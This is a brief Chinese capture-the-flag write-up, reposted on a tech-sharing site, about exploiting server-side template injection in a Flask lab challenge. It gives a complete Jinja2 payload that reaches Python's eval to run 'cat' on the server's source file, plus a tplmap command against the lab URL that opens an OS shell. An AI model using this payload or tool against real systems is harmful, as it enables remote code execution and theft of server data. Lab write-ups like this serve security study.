标签:__ web .__ N1Book py server SSTI os
一、SSTI
参考链接:CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎 (zhihu.com)
先尝试:
发现存在python模板注入,注意不要使用+,网页会出错
根据参考链接,找到 含有 os执行的类,
然后通过 ls , cat 等命令,找到flag,一般在server里
构造payload如下:
?password={{''.__class__.__mro__[1].__subclasses__()[127].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat app/server.py").read()')}}
使用自动化工具:tplmap
python2 tplmap.py -u http://b9810ff4-d735-400d-b3fe-da796a69d63a.node4.buuoj.cn:81/?password=
发现存在注入: 使用 --os-shell 反弹shell
标签:__,web,.__,N1Book,py,server,SSTI,os 来源: https://blog.csdn.net/qq_31710331/article/details/120370559
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。